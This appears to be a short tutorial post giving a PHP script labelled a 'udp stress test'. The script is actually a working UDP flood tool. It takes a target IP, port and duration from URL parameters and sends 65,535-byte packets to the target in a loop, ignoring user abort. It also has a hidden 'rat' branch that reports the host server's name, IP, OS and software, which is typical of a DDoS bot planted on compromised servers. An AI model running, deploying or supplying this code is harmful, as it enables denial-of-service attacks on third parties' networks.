<?php set_time_limit(984918); $host = $_GET['host'];//对方ip $port = $_GET['port'];//端口 $exec_time = $_GET['time'];//持续时长 $Sendlen = 65535; $packets = 0; ignore_user_abort(True); if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ if (StrLen($_GET['rat'])<>0){ echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; exit; } echo "Parameters can not be empty!"; exit; } for($i=0;$i<$Sendlen;$i++){ $out .= "B"; } $max_time = time()+$exec_time; while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Send Host:$host:$port<br><br>"; echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>"; echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s"; ?>
The above introduces the php udp stress test, including the content. I hope it will be helpful to friends who are interested in PHP tutorials.